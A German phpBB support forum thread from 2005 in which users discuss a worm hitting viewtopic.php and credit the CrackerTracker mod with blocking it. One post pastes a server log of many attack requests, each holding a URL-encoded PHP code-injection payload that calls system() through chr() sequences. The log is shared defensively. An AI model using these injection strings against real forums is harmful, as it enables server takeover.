Verfasst: Di 25.Jan, 2005 17:27
So wie das aussieht die viewtopic.php. t= und highlight= gibt es nur da.
bin ich blöd :-)) wo liest du das viewtopic.php ... finde das nicht?
grüsse
OXPUS.de
phpBB-Support, PC Hilfe und vieles mehr...
https://www.oxpus.de:443/
CBACK CrackerTracker Worm Protector
Seite 8 von 11
Verfasst: Di 25.Jan, 2005 22:26
Verfasst: Di 25.Jan, 2005 23:05
Das steht da nicht, aber die von mir genannten Parameter gibt es in dieser Kombination nur in dieser Datei 
Verfasst: Mi 26.Jan, 2005 12:13
aha, wieder was gelernt....
schade das man dass nicht gleich erkennen kann, wo der sack angreift...
liebe grüsse
schade das man dass nicht gleich erkennen kann, wo der sack angreift...
liebe grüsse
Verfasst: Mi 26.Jan, 2005 15:30
Jo die Version die bei Dir (wegen Windoof Server) nicht läuft würde es anzeigen, die für Windoof und/oder in Kombi mit IIS zeigts halt nicht. Kann man nichts machen, die Kombination mit Win is fatal 
Verfasst: Mi 26.Jan, 2005 21:47
na bravo...
typisch billy boy gates... mega kohle einschieben und nichts bieten...
typisch billy boy gates... mega kohle einschieben und nichts bieten...
Verfasst: Do 10.Feb, 2005 16:29
Vielleicht hier nochmal der Hinweis: Der Wurm hat aufgerüstet: Er gibt als Identifikation nun immer Mozilla 4 an!
Ich hatte auch noch den .htaccess Schutz den nachher angepassten bei mir drin und da war ruhe, seit vorgestern leert sich die CrackerTracker Logfile wieder regelmäßig und es gelangen viele Attacken durch, da er als UserAgent Mozilla angibt und nich tmehr LWP. Und Mozilla würde ich nicht sperren, also alle diejenigen die zum .htaccess Schutz noch den CTracker installiert haben sind sicher, wer sich bisher nur auf .htaccess verlassen hat ist zur Zeit wie es aussieht wieder ungeschützt!
Kurz und Knapp: Der Wurm hat sich erweitert, .htaccess filtert es NICHT, CrackerTracker Filtert es erfolgreich
Ich hatte auch noch den .htaccess Schutz den nachher angepassten bei mir drin und da war ruhe, seit vorgestern leert sich die CrackerTracker Logfile wieder regelmäßig und es gelangen viele Attacken durch, da er als UserAgent Mozilla angibt und nich tmehr LWP. Und Mozilla würde ich nicht sperren, also alle diejenigen die zum .htaccess Schutz noch den CTracker installiert haben sind sicher, wer sich bisher nur auf .htaccess verlassen hat ist zur Zeit wie es aussieht wieder ungeschützt!
Kurz und Knapp: Der Wurm hat sich erweitert, .htaccess filtert es NICHT, CrackerTracker Filtert es erfolgreich
Verfasst: Do 10.Feb, 2005 16:36
Das hatte ich soeben gesehen. War fast zeitgleich.
Danke für den kurzen, aber sehr wichtigen Hinweis.
Danke für den kurzen, aber sehr wichtigen Hinweis.
Verfasst: Do 10.Feb, 2005 16:45
Also, mein Board blieb bis ebend verschont, jetzt bombadiert er meine viewtopic...aber er kommt nicht durch.
Cback's CrackerTracker sei dank!
Cback's CrackerTracker sei dank!
Verfasst: Do 10.Feb, 2005 16:48
Hehe, da kann man mal sehen, mein Security System fängt ohne Update auch schon neue Generationen von dem Wurm ab hrr hrr
Einer der nächsten Punkte auf meiner To-Do liste wird übrigens ein Sicherheitscenter für phpBB sein mit Dateiintegritätsprüfung usw. Da aber leider zur Zeit bei mir extrem rundgeht wird das leider nochn bisschen dauern 
Einer der nächsten Punkte auf meiner To-Do liste wird übrigens ein Sicherheitscenter für phpBB sein mit Dateiintegritätsprüfung usw.
Da aber leider zur Zeit bei mir extrem rundgeht wird das leider nochn bisschen dauern Verfasst: Do 10.Feb, 2005 16:50
Wird es denn noch ein Update für den Cracker Tracker geben ?
Aber die Idee mit dem Sicherheitscenter ist klasse!
Aber die Idee mit dem Sicherheitscenter ist klasse!
Verfasst: Do 10.Feb, 2005 17:29
Der Cracker Tracker ist schon fertig, würde ich jetzt mal so frech behaupten, das Sicherheitscenter geht da einen anderen, komplexeren, Weg, so wie ich cback kenne ...
...Verfasst: Do 10.Feb, 2005 17:56
Ich hab den Tracker eben auch mal installiert weil ich massive belagert wurde.....
Super Mod... nun ist erstmal Ruhe. ^b
Eine frage hab ich aber noch... wie bekomme ich den link unter z.B. Allgemeines in ACP ?
Momentan ist der hier !
Super Mod... nun ist erstmal Ruhe. ^b
Eine frage hab ich aber noch... wie bekomme ich den link unter z.B. Allgemeines in ACP ?
Momentan ist der hier !
Verfasst: Do 10.Feb, 2005 19:04
Überprüfe nochmal die Änderung an der TPL Datei. Da scheint ein kleiner Einbaufehler vorzuliegen denn normalerweise steht der Link schon unter "Administration"
Du kennst mich aber gut
das Sicherheitscenter geht da einen anderen, komplexeren, Weg, so wie ich cback kenne wink
Du kennst mich aber gut Verfasst: Do 10.Feb, 2005 19:49
Ja, mit der Zeit...
Verfasst: Do 10.Feb, 2005 21:26
Ich habe, nach wie vor, auf beiden Boards meine ruhe.Also, mein Board blieb bis ebend verschont, jetzt bombadiert er meine viewtopic...aber er kommt nicht durch.
Mal sehen wie lange noch.
Verfasst: Do 10.Feb, 2005 22:05
hatte auch noch keinen einzigen angriff.... is auch gut so!!
Verfasst: Fr 11.Feb, 2005 02:04
:o an einem Tag über 200 Angriffe. Ist scho Wahnsinn.
Verfasst: Fr 11.Feb, 2005 06:22
Bei mir treibt er auch sein unwesen und will unbedingt in die viewtopic rein.
Ich hoffe der kommt nicht durch. Und wenn, wie erkenne ich das dann ?
P.S. das problemchen lag an der besagten *.tpl datei nun ist die Ansicht wieder i.O.
Und so weiter..........10.02.2005, 18:14 216.157.94.254 Mozilla/4.0 /viewtopic.php?p=4995&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:14 64.136.59.83 Mozilla/4.0 /viewtopic.php?p=8255&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:14 200.73.4.201 Mozilla/4.0 /viewtopic.php?t=1060&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:14 66.195.240.157 Mozilla/4.0 /viewtopic.php?p=5434&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:14 195.227.80.3 Mozilla/4.0 /viewtopic.php?p=6638&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:13 69.64.38.39 Mozilla/4.0 /viewtopic.php?p=6589&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:13 69.64.37.126 Mozilla/4.0 /viewtopic.php?p=7584&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:13 83.103.145.150 Mozilla/4.0 /viewtopic.php?p=6331&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:13 210.193.34.215 Mozilla/4.0 /viewtopic.php?p=3132&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:13 62.154.153.5 Mozilla/4.0 /viewtopic.php?p=5615&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:13 62.154.153.5 Mozilla/4.0 /viewtopic.php?p=6140&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:13 69.64.43.136 Mozilla/4.0 /viewtopic.php?p=6324&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:13 61.64.185.40 Mozilla/4.0 /viewtopic.php?p=5862&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:13 62.75.149.81 Mozilla/4.0 /viewtopic.php?p=6833&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:13 66.195.240.90 Mozilla/4.0 /viewtopic.php?p=9220&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:12 80.58.54.42 Mozilla/4.0 /viewtopic.php?p=6084&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:12 217.160.109.18 Mozilla/4.0 /viewtopic.php?p=8335&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:12 69.50.177.114 Mozilla/4.0 /viewtopic.php?p=7611&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:12 212.88.182.14 Mozilla/4.0 /viewtopic.php?p=7330&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:12 82.165.30.153 Mozilla/4.0 /viewtopic.php?p=4007&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:11 217.79.144.102 Mozilla/4.0 /viewtopic.php?p=8399&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:11 202.142.223.237 Mozilla/4.0 /viewtopic.php?p=5567&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527
10.02.2005, 18:11 66.118.159.10 Mozilla/4.0
Ich hoffe der kommt nicht durch. Und wenn, wie erkenne ich das dann ?
P.S. das problemchen lag an der besagten *.tpl datei nun ist die Ansicht wieder i.O.
Verfasst: Fr 11.Feb, 2005 08:38
Wenn der rein kommt, dann ist das Board wech. Zumindest beim Aufrif würdest Du die entsprechende Meldung sehen...
Verfasst: Fr 11.Feb, 2005 15:46
Aha, also wäre es eh zu spät da dann noch was zu retten. Danke für die Antwort.
Verfasst: Mo 14.Feb, 2005 16:53
Ich nochmal, ich hab in der Viewtopic den code mit eingebaut, doch der macht munter bis zu 5x in der Min. weiter.
Ist doch nicht richtig so ? Oder ?
Code: Alles auswählen
sleep(2000); Verfasst: Mo 14.Feb, 2005 17:03
Dies gilt nur für eine Attacke, eine weitere wird davon nicht beeinflusst, es sind mittlerweile einfach zu viele unterschiedlichen Server damit beschäftigt Würmer zu verteilen.
Verfasst: Mo 14.Feb, 2005 17:14
Aha, alles klar, habs auch wieder raus genommen als beim selbsttest die wurm meldung aus blieb. Ich werde immernoch massiv angegriffen. Ist das normal ? Ich denke wenn der Wurm keine Angriffsziel mehr hat gibt der langsam auf?!?
Verfasst: Mo 14.Feb, 2005 17:54
Er probiert es lange Zeit, es hört nur in unregelmäßigen Abständen mal etwas auf, aber solange ja der CTracker eingebaut ist kann Deinem Forum nichts passieren